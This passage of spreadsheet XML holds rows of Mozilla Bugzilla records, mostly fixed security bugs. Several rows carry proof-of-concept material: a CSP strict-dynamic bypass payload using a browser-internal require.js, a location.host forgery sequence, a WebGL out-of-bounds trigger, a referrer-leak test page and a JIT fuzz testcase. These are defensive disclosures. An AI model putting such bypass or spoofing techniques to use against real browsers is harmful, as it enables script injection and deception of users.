          <t>Infrastructure &amp; Operations Graveyard</t>
        </is>
      </c>
      <c r="J1408" t="inlineStr">
        <is>
          <t>WebOps: Other</t>
        </is>
      </c>
      <c r="K1408" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L1408" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1408" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N1408" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1408" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1408" t="inlineStr"/>
      <c r="Q1408" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1408" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1408" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1408" t="n">
        <v>1</v>
      </c>
      <c r="U1408" t="n">
        <v>0</v>
      </c>
      <c r="V1408" t="n">
        <v>7</v>
      </c>
      <c r="W1408" t="inlineStr">
        <is>
          <t>In bug 811869 we are bringing mozqa.com in-house.
It hosts a number of SSL certificates for QA testing
It currently requires six unique public IPs</t>
        </is>
      </c>
      <c r="X1408" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1409">
      <c r="A1409" t="n">
        <v>1067473</v>
      </c>
      <c r="B1409" t="inlineStr">
        <is>
          <t>2014-09-15 10:10:03 -0700</t>
        </is>
      </c>
      <c r="C1409" t="inlineStr">
        <is>
          <t>BarrieredCell&lt;JSObject&gt; is calling the wrong zone() implementation</t>
        </is>
      </c>
      <c r="D1409" t="inlineStr">
        <is>
          <t>2016-06-04 16:07:58 -0700</t>
        </is>
      </c>
      <c r="E1409" t="n">
        <v>1</v>
      </c>
      <c r="F1409" t="n">
        <v>1</v>
      </c>
      <c r="G1409" t="n">
        <v>3</v>
      </c>
      <c r="H1409" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1409" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1409" t="inlineStr">
        <is>
          <t>JavaScript: GC</t>
        </is>
      </c>
      <c r="K1409" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1409" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1409" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1409" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1409" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1409" t="inlineStr">
        <is>
          <t>[fixed by bug 1068223][adv-main35+]</t>
        </is>
      </c>
      <c r="Q1409" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1409" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1409" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1409" t="n">
        <v>1</v>
      </c>
      <c r="U1409" t="n">
        <v>0</v>
      </c>
      <c r="V1409" t="n">
        <v>6</v>
      </c>
      <c r="W1409" t="inlineStr">
        <is>
          <t>While investigating bug 1029549, I noticed a rather serious problem with BarrieredCell. Cell::zone() is implemented on BarrieredCell&lt;T&gt;::zone, such that the default calls T::tenuredZone(). For ObjectImpl, T::zone is overridden as shape_-&gt;tenuredZone() so that it works on Nursery things. However, this is a template and the only override is for ObjectImpl. Even though JSObject, JSFunction, etc derive from ObjectImpl, templates don't work at that level, so when doing MarkInternal&lt;JSObject&gt; we call BarrieredCell&lt;JSObject&gt;::zone, which is not overridden. This gets us the wrong behavior and will crash on or after arenaHeader() if used on a nursery object. This is probably causing real instability in the field.
When reviewing Nick's patch adding BarrieredCell, I convinced myself that this would work somehow, but the stacks in bug 1029549 prove that we were both wrong. I think we should just undo BarrieredCell and bite the bullet with the duplicated code. It's not substantially more code and the extra complexity was hiding at least one real bug.
The security implications here are not really clear, but are certainly bad. In theory, an attacker could mock up an ArenaHeader in the nursery and cause the GC to go off the rails. I'm marking this as sec-high for now.</t>
        </is>
      </c>
      <c r="X1409" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1410">
      <c r="A1410" t="n">
        <v>863320</v>
      </c>
      <c r="B1410" t="inlineStr">
        <is>
          <t>2013-04-18 09:28:54 -0700</t>
        </is>
      </c>
      <c r="C1410" t="inlineStr">
        <is>
          <t>Accept Bluetooth File Transfer Screen Updates</t>
        </is>
      </c>
      <c r="D1410" t="inlineStr">
        <is>
          <t>2014-02-10 11:07:14 -0800</t>
        </is>
      </c>
      <c r="E1410" t="n">
        <v>1</v>
      </c>
      <c r="F1410" t="n">
        <v>1</v>
      </c>
      <c r="G1410" t="n">
        <v>6</v>
      </c>
      <c r="H1410" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I1410" t="inlineStr">
        <is>
          <t>Firefox OS Graveyard</t>
        </is>
      </c>
      <c r="J1410" t="inlineStr">
        <is>
          <t>Gaia::Bluetooth</t>
        </is>
      </c>
      <c r="K1410" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1410" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1410" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="N1410" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1410" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1410" t="inlineStr">
        <is>
          <t>visual design, UX-P1, visual-tracking</t>
        </is>
      </c>
      <c r="Q1410" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1410" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1410" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1410" t="n">
        <v>1</v>
      </c>
      <c r="U1410" t="n">
        <v>0</v>
      </c>
      <c r="V1410" t="n">
        <v>19</v>
      </c>
      <c r="W1410" t="inlineStr">
        <is>
          <t>Created attachment 739127
Accept Bluetooth File Transfer Mock Up
Hi Pavel,
Can you update this screen?  I'll be attaching mock ups and specs, Thanks!
Changes include:
1. Layout updates
2: Change red transfer button to blue</t>
        </is>
      </c>
      <c r="X1410" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1411">
      <c r="A1411" t="n">
        <v>1357090</v>
      </c>
      <c r="B1411" t="inlineStr">
        <is>
          <t>2017-04-17 07:26:59 -0700</t>
        </is>
      </c>
      <c r="C1411" t="inlineStr">
        <is>
          <t>Out-of-bounds array access in WebGLTexture::ImageInfoAtFace</t>
        </is>
      </c>
      <c r="D1411" t="inlineStr">
        <is>
          <t>2024-05-30 09:32:01 -0700</t>
        </is>
      </c>
      <c r="E1411" t="n">
        <v>1</v>
      </c>
      <c r="F1411" t="n">
        <v>1</v>
      </c>
      <c r="G1411" t="n">
        <v>3</v>
      </c>
      <c r="H1411" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1411" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1411" t="inlineStr">
        <is>
          <t>Graphics: CanvasWebGL</t>
        </is>
      </c>
      <c r="K1411" t="inlineStr">
        <is>
          <t>51 Branch</t>
        </is>
      </c>
      <c r="L1411" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1411" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1411" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1411" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1411" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main54+][adv-esr52.2+]</t>
        </is>
      </c>
      <c r="Q1411" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1411" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1411" t="inlineStr">
        <is>
          <t>mozilla55</t>
        </is>
      </c>
      <c r="T1411" t="n">
        <v>1</v>
      </c>
      <c r="U1411" t="n">
        <v>0</v>
      </c>
      <c r="V1411" t="n">
        <v>18</v>
      </c>
      <c r="W1411" t="inlineStr">
        <is>
          <t>Created attachment 8858813
testcase.html
User Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36
Steps to reproduce:
Tested on:
 - Mozilla Firefox 52.0.2 (32-bit) on Windows 10
 - Nightly 55.0a1 (2017-04-10) (64-bit) on Ubuntu 16.04 LTS
Details:
dom/canvas/WebGLTexture.h:
..
313    ImageInfo&amp; ImageInfoAtFace(uint8_t face, uint32_t level) {
314        MOZ_ASSERT(face &lt; mFaceCount);
315        MOZ_ASSERT(level &lt; kMaxLevelCount);
316        size_t pos = (level * mFaceCount) + face;
317        return mImageInfoArr[pos];
318    }
..
By supplying a sufficiently large value to 'level' (see the third parameter of gl.texParameterf() in the provided testcase file), it is possible to cause an out-of-bounds array access in line 317. This may result in a bogus ImageInfo object being returned to the calling function, possibly leading to an exploitable state.
Provided files:
- testcase.html -- Testcase to trigger the issue.
- ASAN_output.txt -- Detailed ASAN output (Linux).
- WinDbg_output.txt -- Further debugging information (Windows).</t>
        </is>
      </c>
      <c r="X1411" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1412">
      <c r="A1412" t="n">
        <v>1273236</v>
      </c>
      <c r="B1412" t="inlineStr">
        <is>
          <t>2016-05-16 12:43:28 -0700</t>
        </is>
      </c>
      <c r="C1412" t="inlineStr">
        <is>
          <t>Once bug 1270851 lands we need to ensure eslint tasks are upgraded back to Tier 1</t>
        </is>
      </c>
      <c r="D1412" t="inlineStr">
        <is>
          <t>2022-08-17 14:00:53 -0700</t>
        </is>
      </c>
      <c r="E1412" t="n">
        <v>1</v>
      </c>
      <c r="F1412" t="n">
        <v>1</v>
      </c>
      <c r="G1412" t="n">
        <v>7</v>
      </c>
      <c r="H1412" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I1412" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="J1412" t="inlineStr">
        <is>
          <t>Lint and Formatting</t>
        </is>
      </c>
      <c r="K1412" t="inlineStr">
        <is>
          <t>3 Branch</t>
        </is>
      </c>
      <c r="L1412" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1412" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1412" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1412" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1412" t="inlineStr"/>
      <c r="Q1412" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1412" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1412" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1412" t="n">
        <v>1</v>
      </c>
      <c r="U1412" t="n">
        <v>0</v>
      </c>
      <c r="V1412" t="n">
        <v>3</v>
      </c>
      <c r="W1412" t="inlineStr">
        <is>
          <t>Once bug 1270851 lands we need to ensure eslint tasks are upgraded back to P1</t>
        </is>
      </c>
      <c r="X1412" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1413">
      <c r="A1413" t="n">
        <v>145579</v>
      </c>
      <c r="B1413" t="inlineStr">
        <is>
          <t>2002-05-19 05:03:08 -0700</t>
        </is>
      </c>
      <c r="C1413" t="inlineStr">
        <is>
          <t>Website can see url of page visited after it (document referer used when loading images with javascript is incorrect while loading a new page)</t>
        </is>
      </c>
      <c r="D1413" t="inlineStr">
        <is>
          <t>2005-05-26 10:49:12 -0700</t>
        </is>
      </c>
      <c r="E1413" t="n">
        <v>1</v>
      </c>
      <c r="F1413" t="n">
        <v>1</v>
      </c>
      <c r="G1413" t="n">
        <v>3</v>
      </c>
      <c r="H1413" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1413" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1413" t="inlineStr">
        <is>
          <t>DOM: Navigation</t>
        </is>
      </c>
      <c r="K1413" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1413" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1413" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1413" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1413" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1413" t="inlineStr">
        <is>
          <t>[adt1] [ETA 09/19]</t>
        </is>
      </c>
      <c r="Q1413" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1413" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1413" t="inlineStr">
        <is>
          <t>mozilla1.0.2</t>
        </is>
      </c>
      <c r="T1413" t="n">
        <v>1</v>
      </c>
      <c r="U1413" t="n">
        <v>17</v>
      </c>
      <c r="V1413" t="n">
        <v>43</v>
      </c>
      <c r="W1413" t="inlineStr">
        <is>
          <t>If a new url is entered into the address bar (and enter or go is pressed) the
browser starts to look up this address.
When a javascript script loads a new image by a setTimeout-triggered event on
the current page while the browser is looking up the new address, the image has
a document referer of http://new page/ instead of http://current page/
Reproducable: always, easier on slow connections or when the server on the other
end is down.
Platform/OS/build: tested on PC/win98/1.0rc2
Refers to: bug 61660
---
code example:
&lt;html&gt;
  &lt;head&gt;
    &lt;script type="text/javascript"&gt;
      function load_image
      {
        document.images["bla"].src="bla2.jpg";
      }
    &lt;/script&gt;
  &lt;/head&gt;
  &lt;body onload="setTimeout('load_image()',10000)"&gt;
    &lt;img name="bla" src="bla.jpg"&gt;
  &lt;/body&gt;
&lt;/html&gt;
For bla2.jpg I used a php-generated image that shows the document referer as the
image.
---
How to reproduce using the above code and by replacing bla2 with an image that
shows the document referer:
- load the html page
- within the 10 second timeout enter a new url (preferably an unreachable server
that would cause a timeout) in your address bar and press enter
- while Mozilla tries to load the new url the javascript is triggered
- the javascript loads bla2.jpg using 'new url' as a document referer.
- Mozilla gives an error: 'new url' not reachable (or if you used a server that
does work it continues loading 'new url'</t>
        </is>
      </c>
      <c r="X1413" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1414">
      <c r="A1414" t="n">
        <v>1111327</v>
      </c>
      <c r="B1414" t="inlineStr">
        <is>
          <t>2014-12-14 01:50:44 -0800</t>
        </is>
      </c>
      <c r="C1414" t="inlineStr">
        <is>
          <t>Assertion failure: aIndex &lt; mLength, at dist/include/mozilla/Vector.h</t>
        </is>
      </c>
      <c r="D1414" t="inlineStr">
        <is>
          <t>2016-06-04 16:13:22 -0700</t>
        </is>
      </c>
      <c r="E1414" t="n">
        <v>1</v>
      </c>
      <c r="F1414" t="n">
        <v>1</v>
      </c>
      <c r="G1414" t="n">
        <v>3</v>
      </c>
      <c r="H1414" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1414" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1414" t="inlineStr">
        <is>
          <t>JavaScript Engine: JIT</t>
        </is>
      </c>
      <c r="K1414" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1414" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1414" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N1414" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1414" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1414" t="inlineStr">
        <is>
          <t>[adv-main37+]</t>
        </is>
      </c>
      <c r="Q1414" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1414" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1414" t="inlineStr">
        <is>
          <t>mozilla37</t>
        </is>
      </c>
      <c r="T1414" t="n">
        <v>1</v>
      </c>
      <c r="U1414" t="n">
        <v>0</v>
      </c>
      <c r="V1414" t="n">
        <v>6</v>
      </c>
      <c r="W1414" t="inlineStr">
        <is>
          <t>// Randomly chosen test: js/src/jit-test/tests/basic/bug908915.js
enableSPSProfilingWithSlowAssertions();
enableSingleStepProfiling();
// Randomly chosen test: js/src/jit-test/tests/asm.js/testResize.js
function a() {
    f = Function.apply(null, arguments);
}
function b() {
    return f.apply(null, Array.slice(arguments, 1));
}
var m = a("\
    \"use asm\"; \
    function f() {}\
    return f\
")
assertEq(b(m, this)(), undefined);
b(m, this)()
asserts js debug 32-bit ARM-simulator shell on m-c changeset f14dcd1c8c0b with --fuzzing-safe --no-threads --ion-eager at Assertion failure: aIndex &lt; mLength, at dist/include/mozilla/Vector.h.
Debug configure options:
LD=ld CROSS_COMPILE=1 CC="clang -Qunused-arguments -msse2 -mfpmath=sse -arch i386" RANLIB=ranlib CXX="clang++ -Qunused-arguments -msse2 -mfpmath=sse -arch i386" AS=$CC AR=ar STRIP="strip -x -S" HOST_CC="clang -Qunused-arguments -msse2 -mfpmath=sse" AUTOCONF=/usr/local/Cellar/autoconf213/2.13/bin/autoconf213 HOST_CXX="clang++ -Qunused-arguments -msse2 -mfpmath=sse" sh /Users/skywalker/trees/mozilla-central/js/src/configure --target=i386-apple-darwin9.2.0 --enable-macos-target=10.5 --enable-arm-simulator --enable-debug --enable-optimize --enable-nspr-build --enable-more-deterministic --with-ccache --enable-gczeal --enable-debug-symbols --disable-tests
This was found by combining random js tests together with jsfunfuzz, the specific file(s) is/are:
http://hg.mozilla.org/mozilla-central/file/f14dcd1c8c0b/js/src/jit-test/tests/basic/bug908915.js
http://hg.mozilla.org/mozilla-central/file/f14dcd1c8c0b/js/src/jit-test/tests/asm.js/testResize.js
autoBisect shows this is probably related to the following changeset:
The first bad revision is:
changeset:   https://hg.mozilla.org/mozilla-central/rev/7797ecb20e4b
user:        Luke Wagner
date:        Tue Jul 29 09:56:21 2014 -0500
summary:     Bug 1040390 - Replace ad hoc methods with JS::ProfilingFrameIterator::label() (r=dougc)
Setting s-s because this seems to involve the SPS profiler.
Luke, is bug 1040390 a likely regressor?</t>
        </is>
      </c>
      <c r="X1414" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1415">
      <c r="A1415" t="n">
        <v>1676311</v>
      </c>
      <c r="B1415" t="inlineStr">
        <is>
          <t>2020-11-09 18:26:07 -0800</t>
        </is>
      </c>
      <c r="C1415" t="inlineStr">
        <is>
          <t>Spoof URL by connecting to an invalid port with a setTimeout call in the originating tab</t>
        </is>
      </c>
      <c r="D1415" t="inlineStr">
        <is>
          <t>2022-11-03 23:26:06 -0700</t>
        </is>
      </c>
      <c r="E1415" t="n">
        <v>1</v>
      </c>
      <c r="F1415" t="n">
        <v>1</v>
      </c>
      <c r="G1415" t="n">
        <v>2</v>
      </c>
      <c r="H1415" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I1415" t="inlineStr">
        <is>
          <t>Fenix</t>
        </is>
      </c>
      <c r="J1415" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K1415" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1415" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1415" t="inlineStr">
        <is>
          <t>Android</t>
        </is>
      </c>
      <c r="N1415" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1415" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1415" t="inlineStr">
        <is>
          <t>[adv-main84+]</t>
        </is>
      </c>
      <c r="Q1415" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1415" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S1415" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1415" t="n">
        <v>1</v>
      </c>
      <c r="U1415" t="n">
        <v>0</v>
      </c>
      <c r="V1415" t="n">
        <v>17</v>
      </c>
      <c r="W1415" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
Steps to reproduce:
go to https://servicenger.com/t.html
click me 
click ok
and then Facebook is spoofed
Actual results:
facebook.com is spoofed 
Expected results:
it should not spoof</t>
        </is>
      </c>
      <c r="X1415" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1416">
      <c r="A1416" t="n">
        <v>1432358</v>
      </c>
      <c r="B1416" t="inlineStr">
        <is>
          <t>2018-01-22 18:27:46 -0800</t>
        </is>
      </c>
      <c r="C1416" t="inlineStr">
        <is>
          <t>Universal CSP strict-dynamic bypass via require.js of browser resource</t>
        </is>
      </c>
      <c r="D1416" t="inlineStr">
        <is>
          <t>2024-07-25 12:19:50 -0700</t>
        </is>
      </c>
      <c r="E1416" t="n">
        <v>1</v>
      </c>
      <c r="F1416" t="n">
        <v>1</v>
      </c>
      <c r="G1416" t="n">
        <v>3</v>
      </c>
      <c r="H1416" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1416" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1416" t="inlineStr">
        <is>
          <t>DOM: Security</t>
        </is>
      </c>
      <c r="K1416" t="inlineStr">
        <is>
          <t>60 Branch</t>
        </is>
      </c>
      <c r="L1416" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1416" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1416" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1416" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1416" t="inlineStr">
        <is>
          <t>[domsecurity-active][adv-main60+]</t>
        </is>
      </c>
      <c r="Q1416" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1416" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1416" t="inlineStr">
        <is>
          <t>mozilla60</t>
        </is>
      </c>
      <c r="T1416" t="n">
        <v>1</v>
      </c>
      <c r="U1416" t="n">
        <v>0</v>
      </c>
      <c r="V1416" t="n">
        <v>87</v>
      </c>
      <c r="W1416" t="inlineStr">
        <is>
          <t>Created attachment 8944629
csp_bypass_require.html
User Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0
Build ID: 20180122220231
Steps to reproduce:
The URLs located in `resource://devtools-client-jsonview/.*` bypass CSP. ( maybe intentionally )
A `require.js` file is in the this directory and it can be used for CSP strict-dynamic bypass against any websites.
Steps to reproduce:
1. Go to attached PoC( csp_bypass_require.html ). This page has strict CSP rules:
&lt;meta http-equiv="Content-Security-Policy" content="default-src 'none';script-src 'nonce-random' 'strict-dynamic'"&gt;
2. However, you can see `alert(1)`. It is executed from the following code:
&lt;script data-main='data:,alert(1)'&gt;&lt;/script&gt;
&lt;script src="resource://devtools-client-jsonview/lib/require.js"&gt;&lt;/script&gt;
Actual results:
CSP strict-dynamic is bypassed via browser resources.
Expected results:
CSP strict-dynamic should not be bypassed via browser resources.</t>
        </is>
      </c>
      <c r="X1416" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1417">
      <c r="A1417" t="n">
        <v>1193093</v>
      </c>
      <c r="B1417" t="inlineStr">
        <is>
          <t>2015-08-10 16:43:13 -0700</t>
        </is>
      </c>
      <c r="C1417" t="inlineStr">
        <is>
          <t>Partial SOP violation via forged location.host</t>
        </is>
      </c>
      <c r="D1417" t="inlineStr">
        <is>
          <t>2019-03-13 06:42:05 -0700</t>
        </is>
      </c>
      <c r="E1417" t="n">
        <v>1</v>
      </c>
      <c r="F1417" t="n">
        <v>1</v>
      </c>
      <c r="G1417" t="n">
        <v>3</v>
      </c>
      <c r="H1417" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1417" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1417" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K1417" t="inlineStr">
        <is>
          <t>39 Branch</t>
        </is>
      </c>
      <c r="L1417" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1417" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1417" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1417" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1417" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main47+]</t>
        </is>
      </c>
      <c r="Q1417" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1417" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1417" t="inlineStr">
        <is>
          <t>mozilla47</t>
        </is>
      </c>
      <c r="T1417" t="n">
        <v>1</v>
      </c>
      <c r="U1417" t="n">
        <v>0</v>
      </c>
      <c r="V1417" t="n">
        <v>24</v>
      </c>
      <c r="W1417" t="inlineStr">
        <is>
          <t>The location.host property can be set to an arbitrary string after creating an invalid data: URI via location.protocol='data'.
Security impact:
An origin security check relying on location.host / location.hostname can potentially be bypassed. The attack surface is limited, though: Since afterwards the scheme is data:, a forged location will not pass any checks involving a http/https location.protocol value. So cookie stealing, etc. would still not be possible.
Proof of Concept:
- Visit http://example.com/.
- location.protocol = 'data';
- location.hostname = 'mozilla.org';
- alert(location.host);
You can encounter some host-only origin validations in the FF source, for instance in the Navigator.registerContentHandler() routine. The function will normally refuse to register a handler for a different host:
navigator.registerContentHandler('application/vnd.mozilla.maybe.feed', 'http://mozilla.org/%s', 'test');
"Permission denied to add http://mozilla.org/%s as a content or protocol handler"
However, after setting the host to mozilla.org as described above, the handler is permitted. Although this particular case is not a severe security problem, there might be similar flaws in other components and addons. Finally, such a host string could now also contain quotes and angle brackets, while some optimistic piece of chrome code might falsely assume that a host does not need to be sanitized for a SQL query / HTML output.</t>
        </is>
      </c>
      <c r="X1417" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1418">
      <c r="A1418" t="n">
        <v>433762</v>
      </c>
      <c r="B1418" t="inlineStr">
        <is>
          <t>2008-05-14 13:46:16 -0700</t>
        </is>
      </c>
      <c r="C1418" t="inlineStr">
        <is>
          <t>Sync stored passwords</t>
        </is>
      </c>
      <c r="D1418" t="inlineStr">
        <is>
          <t>2010-07-16 13:06:29 -0700</t>
        </is>
      </c>
      <c r="E1418" t="n">
        <v>1</v>
      </c>
      <c r="F1418" t="n">
        <v>1</v>
      </c>
      <c r="G1418" t="n">
        <v>2</v>
      </c>
      <c r="H1418" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I1418" t="inlineStr">
        <is>
          <t>Cloud Services</t>
        </is>
      </c>
      <c r="J1418" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K1418" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1418" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1418" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1418" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1418" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1418" t="inlineStr"/>
      <c r="Q1418" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1418" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1418" t="inlineStr">
        <is>
          <t>0.2</t>
        </is>
      </c>
      <c r="T1418" t="n">
        <v>1</v>
      </c>
      <c r="U1418" t="n">
        <v>0</v>
      </c>
      <c r="V1418" t="n">
        <v>13</v>
      </c>
      <c r="W1418" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9b5) Gecko/2008032619 Firefox/3.0b5
Build Identifier: 
Implement an engine (and store and syncCore) for stored passwords so that they can be included in the data that's synced.
Reproducible: Always</t>
        </is>
      </c>
      <c r="X1418" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1419">
      <c r="A1419" t="n">
        <v>593707</v>
      </c>
      <c r="B1419" t="inlineStr">
        <is>
          <t>2010-09-05 11:21:35 -0700</t>
        </is>
      </c>
      <c r="C1419" t="inlineStr">
        <is>
          <t>try-mac64-slave** fail to upload completed build</t>
        </is>
      </c>
      <c r="D1419" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E1419" t="n">
        <v>1</v>
      </c>
      <c r="F1419" t="n">
        <v>1</v>
      </c>
      <c r="G1419" t="n">
        <v>5</v>
      </c>
      <c r="H1419" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I1419" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J1419" t="inlineStr">
